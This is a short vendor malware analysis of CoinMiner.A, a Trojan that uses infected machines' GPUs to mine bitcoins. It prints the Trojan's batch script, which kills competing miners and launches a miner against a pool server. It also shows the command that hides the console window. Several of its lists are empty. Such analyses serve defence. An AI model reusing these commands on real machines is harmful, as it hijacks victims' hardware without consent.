
The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.
The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:
hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:
ping -n 40 google.comtaskkill /f /im cgminer.exetaskkill /f /im svchoost.exetaskkill /f /im mamatije.exetaskkill /f /im mamatije2.exetaskkill /f /im mamatije3.exetaskkill /f /im yaaa3.2.exetaskkill /f /im WinMine.exetaskkill /f /im mamatije4.exemamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2The Trojan adds the following keys to the Windows registry:
The Trojan attemps to open the following files:
The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" via the following command:
C:Documents and Settings{USER}Local SettingsTempacchsbca.exe "/NOCONSOLE C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd"The Trojan runs the following command to ensure internet connectivity:
As defined in "3kal.cmd" the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:
Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
Share This Article

An Article By
An Article By
Security News
Security News